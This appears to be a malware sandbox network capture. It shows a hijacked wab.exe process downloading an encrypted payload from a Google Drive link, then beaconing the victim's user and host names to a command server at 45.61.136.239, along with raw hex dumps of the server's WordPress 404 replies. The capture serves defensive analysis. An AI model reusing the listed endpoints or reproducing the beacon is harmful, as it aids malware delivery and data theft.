                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found &#8211; Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/*! This
                  Jul 3, 2024 09:42:59.589224100 CEST1236INData Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f
                  Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
                  Jul 3, 2024 09:42:59.589231968 CEST448INData Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74
                  Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
                  Jul 3, 2024 09:42:59.589241028 CEST1236INData Raw: 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26
                  Data Ascii: e(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"un
                  Jul 3, 2024 09:42:59.589248896 CEST1236INData Raw: 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d
                  Data Ascii: ;/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !importan
                  Jul 3, 2024 09:42:59.589255095 CEST448INData Raw: 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 7b 6d 61
                  Data Ascii: enter}.is-dark-theme .wp-block-image figcaption{color:#ffffffa6}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote cite,.wp-block-pullquot
                  Jul 3, 2024 09:42:59.589466095 CEST1236INData Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e
                  Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
                  Jul 3, 2024 09:42:59.589477062 CEST1236INData Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b
                  Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</st
                  Jul 3, 2024 09:42:59.589488029 CEST448INData Raw: 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30
                  Data Ascii: ue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminou
                  Jul 3, 2024 09:42:59.589689016 CEST1236INData Raw: 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68
                  Data Ascii: ,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  16192.168.2.74972545.61.136.239807572C:\Program Files (x86)\Windows Mail\wab.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 09:42:59.735537052 CEST250OUTPOST /index.php/54596186971079 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.136.239
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: FC0E2304
                  Content-Length: 165
                  Connection: close
                  Jul 3, 2024 09:42:59.740516901 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                  Data Ascii: (ckav.rufrontdesk849224FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                  Jul 3, 2024 09:43:03.749432087 CEST1236INHTTP/1.0 404 Not Found
                  Date: Wed, 03 Jul 2024 07:43:00 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found &#8211; Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/*! This
                  Jul 3, 2024 09:43:03.749464035 CEST1236INData Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f
                  Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
                  Jul 3, 2024 09:43:03.749480963 CEST1236INData Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74
                  Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
                  Jul 3, 2024 09:43:03.749495983 CEST1236INData Raw: 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72
                  Data Ascii: orts.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).th
                  Jul 3, 2024 09:43:03.749512911 CEST896INData Raw: 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65
                  Data Ascii: order:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:#ffffffa6}.wp-block-embe
                  Jul 3, 2024 09:43:03.749803066 CEST1236INData Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e
                  Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
                  Jul 3, 2024 09:43:03.749819040 CEST224INData Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b
                  Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1
                  Jul 3, 2024 09:43:03.749996901 CEST1236INData Raw: 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 63 6c 61 73 73 69 63 2d 74 68 65 6d 65 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73
                  Data Ascii: .25em 2.375em}</style><style id='classic-theme-styles-inline-css' type='text/css'>/*! This file is auto-generated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;paddin
                  Jul 3, 2024 09:43:03.750010967 CEST224INData Raw: 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 74 6f 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c
                  Data Ascii: --gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0
                  Jul 3, 2024 09:43:03.750026941 CEST1236INData Raw: 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68
                  Data Ascii: ,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%


                  HTTPS Proxied Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.749706142.250.186.1104437572C:\Program Files (x86)\Windows Mail\wab.exe
                  TimestampBytes transferredDirectionData
                  2024-07-03 07:41:34 UTC216OUTGET /uc?export=download&id=1dcAzz5Trh2GumXxq4vI6xXhldh_w3zM0 HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                  Host: drive.google.com
                  Cache-Control: no-cache
                  2024-07-03 07:41:35 UTC1598INHTTP/1.1 303 See Other
                  Content-Type: application/binary
                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                  Pragma: no-cache
                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                  Date: Wed, 03 Jul 2024 07:41:34 GMT
                  Location: https://drive.usercontent.google.com/download?id=1dcAzz5Trh2GumXxq4vI6xXhldh_w3zM0&export=download
                  Strict-Transport-Security: max-age=31536000
                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                  Content-Security-Policy: script-src 'nonce-nkNMn8HQUJ6Ytuahp05evw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                  Cross-Origin-Opener-Policy: same-origin
                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                  Server: ESF
                  Content-Length: 0
                  X-XSS-Protection: 0
                  X-Frame-Options: SAMEORIGIN
                  X-Content-Type-Options: nosniff
                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                  Connection: close


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.749707142.250.185.1934437572C:\Program Files (x86)\Windows Mail\wab.exe
                  TimestampBytes transferredDirectionData
                  2024-07-03 07:41:35 UTC258OUTGET /download?id=1dcAzz5Trh2GumXxq4vI6xXhldh_w3zM0&export=download HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                  Cache-Control: no-cache
                  Host: drive.usercontent.google.com
                  Connection: Keep-Alive
                  2024-07-03 07:41:36 UTC4827INHTTP/1.1 200 OK
                  Content-Type: application/octet-stream
                  Content-Security-Policy: sandbox
                  Content-Security-Policy: default-src 'none'
                  Content-Security-Policy: frame-ancestors 'none'
                  X-Content-Security-Policy: sandbox
                  Cross-Origin-Opener-Policy: same-origin
                  Cross-Origin-Embedder-Policy: require-corp
                  Cross-Origin-Resource-Policy: same-site
                  X-Content-Type-Options: nosniff
                  Content-Disposition: attachment; filename="MuqCNFdqJ78.bin"
                  Access-Control-Allow-Origin: *
                  Access-Control-Allow-Credentials: false
                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                  Accept-Ranges: bytes
                  Content-Length: 106560
                  Last-Modified: Mon, 01 Jul 2024 07:13:56 GMT
                  X-GUploader-UploadID: ACJd0NoTkKKnuh7AbzxfEX_4oX5wK-_ukKBVEZ_BvZTtV_xdBRtrKzDo27zB7APszoXQVighyTe5hLQiew
                  Date: Wed, 03 Jul 2024 07:41:36 GMT
                  Expires: Wed, 03 Jul 2024 07:41:36 GMT
                  Cache-Control: private, max-age=0
                  X-Goog-Hash: crc32c=xGQ0xQ==
                  Server: UploadServer
                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                  Connection: close
                  2024-07-03 07:41:36 UTC4827INData Raw: a6 f4 9c 57 04 37 76 f3 31 ea 67 13 ff 58 c8 5c 65 4d 6f 43 fa ca 08 9f 48 7f 13 e6 22 c4 5e 67 6b de 00 a5 95 19 3e 87 54 94 f0 b5 08 21 4a c7 e5 59 94 3f a4 d1 b8 89 b0 35 6c b2 20 3f fa e8 38 35 e5 bd 63 81 8a 44 bf 5e bd 77 ce 24 14 5d e3 d6 12 6e 3c 02 66 55 ef 7f f7 e2 25 47 f2 79 d5 ef df 2f a6 1c 7b fb 8c d4 e5 ca 36 6b ed 86 e6 14 a5 0d 45 82 56 ad 60 43 82 0d 6e 1b f6 cf 0f db 0f e1 ae 25 8a ab aa fe e1 de 08 1e 4e 04 ce 71 45 e5 b6 56 75 1b f0 32 af 9b 00 30 b6 fb 5c 55 6a 92 43 53 05 9f 5e 7b 14 86 7d ba 82 b0 a5 64 1d b3 45 4c 8e fe c1 a4 9e d4 f4 a5 da 03 ca e9 23 78 98 09 ed b6 ea 51 bf ae cd 7d 41 8c cc 1f eb 86 e8 10 be 99 75 3c 39 e2 c7 31 c1 e1 e0 06 a3 cf d4 ec 5a d6 7e 16 da 79 29 f9 3f ba f5 75 56 43 94 cd bf 29 58 87 47 a6 64 db d5
                  Data Ascii: W7v1gX\eMoCH"^gk>T!JY?5l ?85cD^w$]n<fU%Gy/{6kEV`Cn%NqEVu20\UjCS^{}dEL#xQ}Au<91Z~y)?uVC)XGd
                  2024-07-03 07:41:36 UTC4827INData Raw: ce 97 53 d4 f5 4c 2b ee 28 ac 02 df 2e c6 c9 ab fe 87 63 88 a9 2d e1 2b 04 18 44 e6 b3 76 05 35 be e0 53 c5 db 09 9c 65 e3 4e 2f 7d 14 c8 fc a4 1c 1f 3d 6e 81 7b 1e e9 88 6a 36 88 ba 57 d5 b6 13 f7 7a 74 96 6e d7 b9 67 fa 2f 71 95 e3 c6 84 0b 8a d6 bb 36 0a 07 4b a1 83 d8 74 04 ab a3 1c d1 a9 cb 94 7a a1 23 4b dc e8 ad 58 14 da 83 2a 24 b8 d1 ae e2 62 6d d6 9b f2 11 0a 72 8e 43 5f dc 82 db 43 5d 96 ff 83 2f 18 6f 2d 02 04 ec 59 67 da 5f 35 04 b5 4e 0c 39 4b fa 89 1e 5d 4b c3 a9 c8 66 31 03 a6 50 94 bd b8 1f 2a 15 92 5b b8 31 f6 26 02 73 05 d0 e3 6a 9e be 6d 4d b8 33 f6 33 40 6c 7a d9 dd a2 83 d7 d5 0b 4f 07 e0 6f ba 93 71 81 0f 65 ee 3e a9 e5 21 81 69 5e 48 00 2a 6d 36 a7 89 86 d6 29 37 90 a6 1d 1c ea 85 8e c9 7d e5 5f 5a cc 52 43 73 5a a0 87 bb 3a 4b c6
                  Data Ascii: SL+(.c-+Dv5SeN/}=n{j6Wztng/q6Ktz#KX*$bmrC_C]/o-Yg_5N9K]Kf1P*[1&sjmM33@lzOoqe>!i^H*m6)7}_ZRCsZ:K
                  2024-07-03 07:41:36 UTC216INData Raw: 67 c7 99 e9 5a 72 fd d6 ad eb a7 0c 5e 22 ac cd 83 c7 66 03 4f 41 c0 ad 03 18 b7 b1 c7 d0 3a aa e8 d4 32 c0 33 2c 65 80 c2 a0 a5 e1 b8 24 76 5c db 58 2c 57 2e c1 6b 76 78 25 8e 54 bc 2e cb f5 3c 44 d9 35 6b 6f 1f d8 7d 0d a2 14 a8 2e f4 19 cd cf ba 2a d5 35 41 80 90 d5 12 55 c9 f8 45 36 cc e3 e0 01 c7 32 73 7d f3 5f be 1f ec 38 77 e6 58 7f 37 63 d1 94 f1 12 73 9e 18 78 d8 a1 52 2a c9 82 b5 81 33 0d 92 c7 ff 2f dc 9d 9a e5 ff 4a 9a d1 27 5e 03 85 82 30 5a c9 53 77 4c c2 2f 1c bb a4 e3 c5 cd 1c f6 66 e2 42 ac 28 ac 30 c2 b2 cf 3d c1 c4 78 24 b3 a4 cc 07 45 1b 02 e7 7a 64 02 40 64 cb 5f 0f 20 1c 4a a9 c0 a6 bf 70 c4 70 7f 15 b0 53 72 3e 07 81
                  Data Ascii: gZr^"fOA:23,e$v\X,W.kvx%T.<D5ko}.*5AUE62s}_8wX7csxR*3/J'^0ZSwL/fB(0=x$Ezd@d_ JppSr>
                  2024-07-03 07:41:36 UTC1324INData Raw: 27 ad 9f c3 93 af 83 0d 34 c4 31 44 6e 55 43 4e 76 75 9e b1 2f ab 06 2c d1 39 3d d0 9f c7 f1 5d 0a 48 f9 32 cd b0 09 af 67 a8 e7 b8 f5 8c 5e 00 3c bd 77 c9 d8 5c 00 08 8f 4b ee 6b dc 2b 48 d8 65 09 2d a4 7f f0 f9 2a 6e cb d6 7b e4 75 3a 2a c2 e6 90 75 0f 19 91 6f 0d 5d 40 5a f1 39 bc 9c 7d 5b 63 c0 85 bf 80 ff 63 4d 81 4b 13 eb 0e 11 69 39 37 30 4d 76 3d 36 c5 8c 62 0b d7 b9 e7 cd 10 48 31 c2 77 74 32 71 2f d6 ec 34 ee cd 2c 5d 24 ac 07 6f 67 cb 2d e9 c6 f3 c1 b5 91 e6 ba 9e 70 b6 2c 7a 65 3d 60 97 fb 6f de 83 72 fe 52 ae a1 b5 b7 46 59 8c 71 06 e1 06 39 b8 32 a5 20 57 33 31 bb da a0 af 9f 1c 55 71 fd 25 9f 79 ff 27 ba b9 10 a2 fc 9b 65 4c 00 e8 03 fc cb b2 2c 51 a4 40 fa e8 79 32 a8 bb 70 f2 78 79 54 bb ec eb 39 3c 91 8d 97 a3 12 96 e5 15 64 fe 85 d0 c2
                  Data Ascii: '41DnUCNvu/,9=]H2g^<w\Kk+He-*n{u:*uo]@Z9}[ccMKi970Mv=6bH1wt2q/4,]$og-p,ze=`orRFYq92 W31Uq%y'eL,Q@y2pxyT9<d
